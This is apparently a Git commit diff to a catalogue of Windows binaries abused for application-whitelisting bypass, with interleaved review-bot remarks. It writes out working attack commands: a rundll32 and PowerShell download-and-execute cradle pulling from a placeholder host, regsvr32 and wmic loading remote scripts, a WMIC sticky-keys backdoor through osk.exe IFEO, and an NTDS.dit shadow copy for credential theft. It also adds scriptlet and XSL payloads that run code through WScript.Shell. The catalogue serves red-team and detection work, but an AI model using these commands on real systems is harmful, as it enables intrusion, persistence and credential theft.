Added some more adjustments
parent
1a0eb4edc7
commit
610e5d7607
|
@ -11,8 +11,8 @@ Acknowledgements:
|
|||
|
||||
|
||||
Code sample:
|
||||
* [AllTheThingsX64.dll - Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)
|
||||
* [AllTheThingsX32.dll - Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx32.dll)
|
||||
* [AllTheThingsX64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1]
|
||||
* [AllTheThingsX32.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx32.dll)[1]
|
||||
|
||||
Resources:
|
||||
* https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
|
||||
|
@ -31,7 +31,7 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
|
|||
```
|
||||
|
||||
Notes:
|
||||
|
||||
[1]Code sample linked to Red Canary - Atomic Red Team
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -10,7 +10,7 @@ Acknowledgements:
|
|||
* ?
|
||||
|
||||
Code sample:
|
||||
* [NameOfLink](Payload/NameOfPayload)
|
||||
*
|
||||
|
||||
Resources:
|
||||
* https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
|
||||
|
|
|
@ -0,0 +1,23 @@
|
|||
<?XML version="1.0"?>
|
||||
<scriptlet>
|
||||
<registration
|
||||
progid="PoC"
|
||||
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
|
||||
<!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll -->
|
||||
|
||||
<!-- .sct files when downloaded, are executed from a path like this -->
|
||||
<!-- Please Note, file extenstion does not matter -->
|
||||
<!-- Though, the name and extension are arbitary.. -->
|
||||
<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
|
||||
<!-- Based on current research, no registry keys are written, since call "uninstall" -->
|
||||
<!-- You can either execute locally, or from a url -->
|
||||
<script language="JScript">
|
||||
<![CDATA[
|
||||
// calc.exe should launch, this could be any arbitrary code.
|
||||
// What you are hoping to catch is the cmdline, modloads, or network connections, or any variation
|
||||
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
||||
|
||||
]]>
|
||||
</script>
|
||||
</registration>
|
||||
</scriptlet>
|
|
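Review bot: The XML declaration on the first line of the new scriptlet is `<?XML version="1.0"?>`; an upper-case `XML` target is reserved and not a valid XML declaration, so strict XML tooling (validators, XML-aware analysis pipelines) will refuse to parse the file even if the scriptlet host is lenient with it, and `<?xml version="1.0"?>` as used in the .xsl file added in this commit would be consistent. Two comment typos in the same hunk: `file extenstion does not matter` → `file extension does not matter` and `name and extension are arbitary..` → `name and extension are arbitrary.`. The comment `Based on current research, no registry keys are written` is an unhedged claim; suggest qualifying it with the environment it was observed on, e.g. `<!-- Observed on [Windows version placeholder]: no registry keys written with /u (uninstall) -->`, so detection engineers know when to re-verify.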
@ -0,0 +1,11 @@
|
|||
<?xml version='1.0'?>
|
||||
<stylesheet
|
||||
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
|
||||
xmlns:user="placeholder"
|
||||
version="1.0">
|
||||
<output method="text"/>
|
||||
<ms:script implements-prefix="user" language="JScript">
|
||||
<![CDATA[
|
||||
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
||||
]]> </ms:script>
|
||||
</stylesheet>
|
|
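Review bot: The new stylesheet has no comment stating what it is for or what a defender should expect to observe, unlike the .sct sample in this commit which documents both; suggest a header comment such as `<!-- Test payload: the ms:script block launches calc.exe via WScript.Shell when the stylesheet is processed; expected observable is the child process spawned by the loading host -->`. Separately, if this is the Wmic_calc.xsl sample, the WMIC.exe section of this commit links it as `Payloads/Wmic_calc.xls`, which matches neither the `.xsl` extension nor the `Payload/` directory the Regsvr32 section uses, so that link is probably broken.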
@ -3,14 +3,15 @@
|
|||
* Functions: Execute
|
||||
|
||||
```
|
||||
regasm.exe /U AllTheThings.dll
|
||||
regasm.exe /U AllTheThingsx64.dll
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Casey Smith - @subtee
|
||||
|
||||
Code sample:
|
||||
* [AllTheThingsx64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1]
|
||||
* [AllTheThingsx64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1]
|
||||
* [AllTheThingsx86.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx86.dll)[1]
|
||||
|
||||
Resources:
|
||||
* https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
|
||||
|
|
|
@ -3,10 +3,29 @@
|
|||
* Functions: Execute
|
||||
|
||||
```
|
||||
regsvcs.exe /U regsvcs.dll
|
||||
|
||||
regsvcs.exe regsvcs.dll
|
||||
regsvcs.exe AllTheThingsx64.dll
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Casey Smith - @subtee
|
||||
* Casey Smith - @subtee
|
||||
|
||||
Code sample:
|
||||
* [AllTheThingsx64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1]
|
||||
* [AllTheThingsx86.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx86.dll)[1]
|
||||
|
||||
Resources:
|
||||
* https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
|
||||
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
|
||||
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
|
||||
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||
|
||||
Full path:
|
||||
```
|
||||
C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe
|
||||
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe
|
||||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
|
||||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe
|
||||
```
|
||||
|
||||
Notes:
|
||||
[1]Code sample linked to Red Canary - Atomic Red Team
|
|
@ -3,11 +3,33 @@
|
|||
* Functions: Execute
|
||||
|
||||
```
|
||||
regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
|
||||
regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
|
||||
|
||||
regsvr32.exe /s /u /i:file.sct scrobj.dll
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Casey Smith - @subtee
|
||||
|
||||
Code sample:
|
||||
* [Regsvr32_calc.sct](Payload/Regsvr32_calc.sct)[1]
|
||||
|
||||
Resources:
|
||||
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Regsvr32.md
|
||||
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||
* https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
|
||||
|
||||
Full path:
|
||||
```
|
||||
C:\Windows\System32\regsvr32.exe
|
||||
C:\Windows\SysWOW64\regsvr32.exe
|
||||
```
|
||||
|
||||
Notes:
|
||||
[1]Code sample linked to Red Canary - Atomic Red Team
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
|
@ -3,6 +3,8 @@
|
|||
* Functions: Execute
|
||||
|
||||
```
|
||||
rundll32.exe AllTheThingsx64,EntryPoint
|
||||
|
||||
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
|
||||
|
||||
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
|
||||
|
@ -37,6 +39,27 @@ Acknowledgements:
|
|||
* Jimmy - @bohops
|
||||
* Moriarty - @Moriarty_Meng
|
||||
* Adam - @hexacorn
|
||||
|
||||
|
||||
Code sample:
|
||||
* [AllTheThingsx64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1]
|
||||
* [AllTheThingsx86.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx86.dll)[1]
|
||||
|
||||
Resources:
|
||||
* https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/
|
||||
* https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7
|
||||
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Rundll32.md
|
||||
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||
|
||||
Full path:
|
||||
```
|
||||
C:\Windows\System32\rundll32.exe
|
||||
C:\Windows\SysWOW64\rundll32.exe
|
||||
```
|
||||
|
||||
Notes:
|
||||
[1]Code sample linked to Red Canary - Atomic Red Team
|
||||
|
||||
|
||||
|
||||
|
||||
|
|
@ -9,4 +9,22 @@ runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.tx
|
|||
Acknowledgements:
|
||||
* Matt Graeber - @mattifestation
|
||||
|
||||
Code sample:
|
||||
*
|
||||
|
||||
Resources:
|
||||
* https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc
|
||||
|
||||
Full path:
|
||||
```
|
||||
C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
|
||||
C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe
|
||||
```
|
||||
|
||||
Notes:
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
|
@ -8,3 +8,21 @@ SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http
|
|||
|
||||
Acknowledgements:
|
||||
* Nick Landers - @monoxgas
|
||||
|
||||
Code sample:
|
||||
*
|
||||
|
||||
Resources:
|
||||
* https://twitter.com/monoxgas/status/895045566090010624
|
||||
|
||||
Full path:
|
||||
```
|
||||
C:\Windows\System32\SyncAppvPublishingServer.exe
|
||||
```
|
||||
|
||||
Notes:
|
||||
Command injection into PowerShell
|
||||
Might have been fixed in newest version of Windows 10.
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -1,16 +1,56 @@
|
|||
## WMIC.exe
|
||||
|
||||
* Functions: Execute
|
||||
* Functions: Reconnaissance, Execute, Read ADS
|
||||
|
||||
```
|
||||
wmic process call create calc
|
||||
wmic process call create calc
|
||||
|
||||
wmic process get brief /format:"https://www.example.com/file.xsl
|
||||
|
||||
wmic os get /format:"MYXSLFILE.xsl"
|
||||
|
||||
wmic process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"
|
||||
wmic process call create '"c:\ads\file.txt:program.exe"'
|
||||
|
||||
wmic useraccount get /ALL
|
||||
|
||||
wmic process get caption,executablepath,commandline
|
||||
|
||||
wmic qfe get description,installedOn /format:csv
|
||||
|
||||
wmic /node:"192.168.0.1" service where (caption like "%sql server (%")
|
||||
|
||||
get-wmiobject –class "win32_share" –namespace "root\CIMV2" –computer "targetname"
|
||||
|
||||
wmic /user:<username> /password:<password> /node:<computer_name> process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
|
||||
|
||||
wmic /NODE: "192.168.0.1" process call create "evil.exe"
|
||||
|
||||
wmic /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt"
|
||||
|
||||
wmic /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"
|
||||
|
||||
wmic process get brief /format:"https://www.example.com/file.xsl"
|
||||
|
||||
wmic os get /format:"MYXSLFILE.xsl"
|
||||
|
||||
wmic process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Casey Smith - @subtee
|
||||
|
||||
Code sample:
|
||||
* [Wmic_calc.xsl](Payloads/Wmic_calc.xls)
|
||||
|
||||
Resources:
|
||||
* https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory
|
||||
* https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html
|
||||
* https://twitter.com/subTee/status/986234811944648707
|
||||
|
||||
Full path:
|
||||
```
|
||||
c:\windows\system32\wbem\wmic.exe
|
||||
c:\windows\sysWOW64\wbem\wmic.exe
|
||||
```
|
||||
|
||||
Notes:
|
||||
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -3,8 +3,28 @@
|
|||
* Functions: DLL hijack
|
||||
|
||||
```
|
||||
xwizard.exe (xwizard.dll in same folder)
|
||||
xwizard.exe
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Adam - @Hexacorn
|
||||
* Adam - @Hexacorn
|
||||
|
||||
Code sample:
|
||||
*
|
||||
|
||||
Resources:
|
||||
* http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/
|
||||
|
||||
Full path:
|
||||
```
|
||||
c:\windows\system32\xwizard.exe
|
||||
c:\windows\sysWOW32\xwizard.exe
|
||||
```
|
||||
|
||||
Notes:
|
||||
Need to copy out xwizard.exe to a user controlled folder.
|
||||
If you add your own version of xwizard.dll it will execute when you start xwizard.exe.
|
||||
|
||||
|
||||
|
||||
|
||||
|
|